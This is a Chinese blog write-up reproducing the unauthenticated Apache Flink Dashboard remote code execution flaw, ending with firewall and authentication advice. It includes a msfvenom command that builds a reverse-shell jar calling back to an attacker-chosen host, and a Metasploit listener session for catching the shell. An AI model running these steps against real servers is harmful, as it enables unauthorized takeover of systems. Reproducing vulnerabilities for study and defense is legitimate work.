![v2-f1ad56bf3115dbcbafee9b4319b8fdda_b.jpg](https://img-blog.csdnimg.cn/img_convert/be5c4ec755c5ddbcd3e1e645346d9152.png)
好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现。
Apache Flink未授权访问-远程代码命令执行-复现
![v2-e898c86a9f407697d5f7678d22fbb447_b.jpg](https://img-blog.csdnimg.cn/img_convert/98fed572c3e040cc973909f77d7d0df5.png)
一、漏洞简介
Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过未授权的Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。
二、影响版本
Apache Flink <= 1.9.1(最新版本)
三、漏洞复现
1、生成反弹jar包
msfvenom-p java/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=4444-f jar > rce.jar
![v2-b82384ed042a1c4457f5b10f295c84fa_b.png](https://img-blog.csdnimg.cn/img_convert/1f9e00eb63b7bfc747803df61c305e82.png)
2、msf设置监听
msf5> use exploit/multi/handler [*]Using configured payload generic/shell_reverse_tcpmsf5exploit(multi/handler) > set payload java/shell/reverse_tcp payload=> java/shell/reverse_tcpmsf5exploit(multi/handler) > show options Moduleoptions (exploit/multi/handler):NameCurrent Setting Required Description------------------- -------- -----------Payloadoptions (java/shell/reverse_tcp):NameCurrent Setting Required Description------------------- -------- -----------LHOSTyes The listen address (an interface may be specified)LPORT4444 yes The listen portExploittarget:IdName------0Wildcard Targetmsf5exploit(multi/handler) > set LHOST XX.XX.XX.XXLHOST=> XX.XX.XX.XXmsf5exploit(multi/handler) > exploit [*]Started reverse TCP handler on XX.XX.XX.XX:4444
![v2-e31c7bf8f9c7eeeaf1c55cae10eda266_b.jpg](https://img-blog.csdnimg.cn/img_convert/8a8d6db5f7fe7e6569ae43dfb4f9e62c.png)
3、上传 Jar包,并且提交
![v2-2f84d27815e6a9322c7290602270734f_b.jpg](https://img-blog.csdnimg.cn/img_convert/8727235c3dc1de82348e724c31073e21.png)
监听接受反弹的shell,获取权限
![v2-c68a4e87412b2d23b5dd32180e7eb2df_b.jpg](https://img-blog.csdnimg.cn/img_convert/cc60b6feb52a6decd4c70756582d8a25.png)
四、安全建议
1. 请关注Apache Flink官方以便获取更新信息:https://flink.apache.org/
2.针对ApacheFlinkDashboard设置防火墙策略(禁止Dashboard对外访问,或者确保只对可信端点开放), 仅允许白名单IP进行访问,并在Web代理中增加对该服务的Digest认证,防止未授权访问。关于认证设置可参考链接:
https://httpd.apache.org/docs/2.4/mod/mod_auth_digest.html。
五、参考连接
http://www.llidc.com/news/858.html
https://nitec.jhun.edu.cn/da/64/c4987a121444/page.htm
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
![v2-c80c87cb78cf66222785b2baa2a6c6f9_b.jpg](https://img-blog.csdnimg.cn/img_convert/a3750de25cad40b2b8daaa4825249926.png)
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
原文连接:https://mp.weixin.qq.com/s/aomCajnZVA9WlnBqTE_QPg
![v2-e0038f5515df1ac5006bb633bd45db6e_b.jpg](https://img-blog.csdnimg.cn/img_convert/39358506c6106e9fc87710404f0b2afe.png)